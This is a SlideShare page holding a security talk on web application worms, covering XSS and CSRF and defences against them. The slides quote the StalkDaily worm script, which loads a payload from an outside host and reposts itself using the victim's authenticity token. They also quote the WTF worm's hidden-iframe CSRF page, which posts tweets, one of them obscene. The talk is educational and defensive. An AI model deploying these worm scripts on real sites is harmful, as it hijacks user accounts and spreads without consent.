Web Application Worms                By: Mostafa Siraj@mostafasiraj
Agenda• Computer Worms• Why Hackers Develop WebApplication Worms• Web Application Worms• Introduction to XSS• StalkDaily W...
DISCLAIMER – Hacking websites is ILLEGAL – This presentation is meant for educational purposes ONLY – Only use this stuff ...
Computer WormA computer worm is astandalone malware computerprogram that replicates itself inorder to spread to othercompu...
Why Hackers Develop Web Application Worms • Easier to develop • Cross platform (Windows, Linux, OSX and Android) since exe...
Percentage likelihood that at least one serious    vulnerability will appear in a website                (4) According to ...
Web Application Worms An XSS worm is a malicious (or sometimes non-malicious) payload, usually written in JavaScript, that...
How XSS Starts                Adidas                                          Website@mostafasiraj
Cross Site Scripting (Reflected)                                                   Vulnerable     example.com?q=<script>……...
Cross Site Scripting (Stored XSS)                                                    Vulnerable                           ...
XSS Worms StalkDaily Worm on Twitter@mostafasiraj
StalkDaily Worm                                               The bio field allowed Javascript           <script src="hxxp...
StalkDaily Script                              (6) source from dcortesi.comupdate = urlencode("Hey everyone, join www.Stal...
StalkDaily Infected Users@mostafasiraj
What About    CSRF Worms@mostafasiraj
CSRF Example                         User has to be logged in     https://www.MyBank.com/Transfer?from=user&to=hacker&amou...
CSRF Worms WTF Worm on Twitter@mostafasiraj
WTF Worm                                                 Updating Status on Twitter wasn’t                                ...
WTF Worm Script                         (7) script source http://christianheilmann.com<html> <head></head> <body> <script>...
Discussion about WTF worm on                  Twitter@mostafasiraj
XSS and CSRF on Facebook                 Searches was done on Google@mostafasiraj
Potential Business Impact of               Web Application Worms• The snowball effect (Samy versus Code Red)• Web browser ...
@mostafasiraj                XSS & CSRF Defenses
Defenses for Users• Exercise caution when clicking on links sent  by email, instant message or through social  networks• U...
Defenses for Web DevelopersXSS    –   Input Validation -accept only known good-    –   Output Encoding (ESAPI)    –   Set ...
Security Professionals • Remember “The natural way of   writing code is insecure” • Developers must take application secur...
Questions@mostafasiraj
References(1) Computer Worm on Wikipedia. http://en.wikipedia.org/wiki/Computer_worm(2) Active Users on Facebook. http://f...
Upcoming SlideShare
Loading in …5
×

Web application worms

1,448 views

Published on

Web application vulnerabilities are dangerous. Hackers can target the web application directly (e.g. via SQL Injection) or can target the web application users (e.g. via XSS). In recent years a new type of attacks was developed in which an infected innocent user is infecting other users (AKA Web Application Worms). Such attacks usually has an exponential growth and a massive damage. This presentation we will discuss how to develop a web application worm and most importantly how to protect your website from web application worms.

0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total views
1,448
On SlideShare
0
From Embeds
0
Number of Embeds
6
Actions
Shares
0
Downloads
20
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide
  • Gandalf vsbalrog
  • Web application worms

    1. 1. Web Application Worms By: Mostafa Siraj@mostafasiraj
    2. 2. Agenda• Computer Worms• Why Hackers Develop WebApplication Worms• Web Application Worms• Introduction to XSS• StalkDaily Worm on Twitter - XSS Worm• Introduction to CSRF• WTF Worm on Twitter – CSRF Worm• Potential Business Impact• XSS & CSRF Defenses for • Users • Web Developers • Security Professionals• Questions @mostafasiraj
    3. 3. DISCLAIMER – Hacking websites is ILLEGAL – This presentation is meant for educational purposes ONLY – Only use this stuff on YOUR website and YOUR account@mostafasiraj
    4. 4. Computer WormA computer worm is astandalone malware computerprogram that replicates itself inorder to spread to othercomputers. Often, it uses acomputer network to spreaditself, relying on securityfailures on the target computerto access it.(1) According to Wikipedia@mostafasiraj
    5. 5. Why Hackers Develop Web Application Worms • Easier to develop • Cross platform (Windows, Linux, OSX and Android) since execution occurs in web browser • Don’t rely on browser, application or OS vulnerabilities • Can propagate faster and cleaner than even the most notorious worms • 1.01 billion active users on FB (2) according to yahoo finance • 170 million active users on Twitter (3) according to techcrunch @mostafasiraj
    6. 6. Percentage likelihood that at least one serious vulnerability will appear in a website (4) According to whitehat security website statistics report, Summer 2012@mostafasiraj
    7. 7. Web Application Worms An XSS worm is a malicious (or sometimes non-malicious) payload, usually written in JavaScript, that propagate among visitors of a website in the attempt Internet to progressively infect other visitors. (5) According to Wikipedia with modificationYou’ll see how to create a worm using a CSRF vulnerability only without XSS@mostafasiraj
    8. 8. How XSS Starts Adidas Website@mostafasiraj
    9. 9. Cross Site Scripting (Reflected) Vulnerable example.com?q=<script>……. Site Hacker Site Cookie@mostafasiraj
    10. 10. Cross Site Scripting (Stored XSS) Vulnerable Site Hacker Site Cookie@mostafasiraj
    11. 11. XSS Worms StalkDaily Worm on Twitter@mostafasiraj
    12. 12. StalkDaily Worm The bio field allowed Javascript <script src="hxxp://mikeyylolz.uuuq.com/x.js>“ /> @mostafasiraj
    13. 13. StalkDaily Script (6) source from dcortesi.comupdate = urlencode("Hey everyone, join www.StalkDaily.com. Its a site like Twitter but with pictures, videos, and so much more! :)");xss = urlencode(http://www.stalkdaily.com"></a><script src="http://mikeyylolz.uuuq.com/x.js"></script><script src="http://mikeyylolz.uuuq.com/x.js"></script><a );var ajaxConn = new XHConn();ajaxConn.connect("/status/update", "POST", "authenticity_token="+authtoke n+"&status="+update+"&tab=home&update=update");ajaxConn1.connect("/account/settings", "POST", "authenticity_token="+autht oken+"&user[url]="+xss+"&tab=home&update=update")@mostafasiraj
    14. 14. StalkDaily Infected Users@mostafasiraj
    15. 15. What About CSRF Worms@mostafasiraj
    16. 16. CSRF Example User has to be logged in https://www.MyBank.com/Transfer?from=user&to=hacker&amount=9999 MyBank.com Click Here to Win@mostafasiraj
    17. 17. CSRF Worms WTF Worm on Twitter@mostafasiraj
    18. 18. WTF Worm Updating Status on Twitter wasn’t protected from CSFR By visiting the hacker site, your twitter account will automatically write two tweets @mostafasiraj
    19. 19. WTF Worm Script (7) script source http://christianheilmann.com<html> <head></head> <body> <script>var el1 = document.createElement(iframe);var el2 = document.createElement(iframe);el1.style.visibility="hidden";el2.style.visibility="hidden";el1.src = "http://twitter.com/share/update?status=WTF:%20" + window.location;el2.src = "http://twitter.com/share/update?status=i%20love%20anal%20sex%20with% 20goats";document.getElementsByTagName("body")[0].appendChild(el1);document.getElementsByTagName("body")[0].appendChild(el2);</script> </body> </html>@mostafasiraj
    20. 20. Discussion about WTF worm on Twitter@mostafasiraj
    21. 21. XSS and CSRF on Facebook Searches was done on Google@mostafasiraj
    22. 22. Potential Business Impact of Web Application Worms• The snowball effect (Samy versus Code Red)• Web browser botnets (DDoS)• Think about a worm targeting eBay or Amazon (purchases,reviews,..etc)• Stealing users’ credentials (MySpace worm on 2006) (10) According to computerworld.com• What could happen if AdSense or Facebook Connect was compromised with a web application worm• “High Roller” malware targeting cloud based banking (estimated losses 75M-2.5B) (11) According to redmondmag.com @mostafasiraj
    23. 23. @mostafasiraj XSS & CSRF Defenses
    24. 24. Defenses for Users• Exercise caution when clicking on links sent by email, instant message or through social networks• Use ScriptNo on Chrome and NoScript on Firefox ( Use IE at your own risk  )• Avoid questionable websites and cracked softwares• Be alerted by security incidents@mostafasiraj
    25. 25. Defenses for Web DevelopersXSS – Input Validation -accept only known good- – Output Encoding (ESAPI) – Set the session cookie to be “HTTPOnly” – Specify the output encoding ( UTF-8, ASCII, …etc) – Do not use "blacklist" validation – Don’t encode/decode more than once  – (8) XSS Prevention Cheat Sheet on OWASPCSRF – Use CSRFGuard from OWASP – Do not use the GET method for any request that triggers a state change. – Identify especially dangerous operations and send a separate confirmation request to ensure that the user intended to perform that operation. – Ensure that there are no XSS vulnerabilities in your application – (9) CSRF Prevention Cheat Sheet on OWASP@mostafasiraj
    26. 26. Security Professionals • Remember “The natural way of writing code is insecure” • Developers must take application security training • Secure the whole SDLC • Assessments and Penetration Tests • White box and black box testing • Start considering WAF @mostafasiraj
    27. 27. Questions@mostafasiraj
    28. 28. References(1) Computer Worm on Wikipedia. http://en.wikipedia.org/wiki/Computer_worm(2) Active Users on Facebook. http://finance.yahoo.com/news/number-active-users-facebook-over-years-214600186--finance.html(3) Active Users on Twitter http://techcrunch.com/2012/07/31/twitter-may-have-500m-users-but-only-170m-are-active-75-on-twitters-own- clients/(4) whitehat security website statistics report, https://www.whitehatsec.com/assets/WPstats_summer12_12th.pdf(5) XSS Worms on Wikipedia, http://en.wikipedia.org/wiki/XSS_worm(6) StalkDaily script, http://www.dcortesi.com/blog/2009/04/11/twitter-stalkdaily-worm-postmortem/(7) WTF script, http://christianheilmann.com(8) XSS Prevention Cheat Sheet, https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet(9) CSRF Prevention Cheat Sheet, https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)_Prevention_Cheat_Sheet(10) MySpace worm, http://www.computerworld.com/s/article/9005607/MySpace_worm_uses_QuickTime_for_exploit(11) High Roller malware, http://redmondmag.com/articles/2012/06/20/malware-targeting-banking.aspx @mostafasiraj

    ×